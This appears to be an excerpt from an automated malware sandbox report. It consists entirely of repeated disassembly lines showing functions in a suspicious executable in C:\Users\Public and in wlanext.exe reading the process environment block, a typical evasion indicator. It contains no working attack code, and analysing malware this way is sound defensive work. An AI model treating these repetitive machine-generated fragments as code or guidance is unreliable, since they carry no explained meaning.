            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B63A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B58A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BD4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C15BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BF8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BCA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B67D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B83D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BF3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B88EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B78E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B58794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D7B70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A9BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8BB6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391BA8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4B94 mov edi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D1BE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
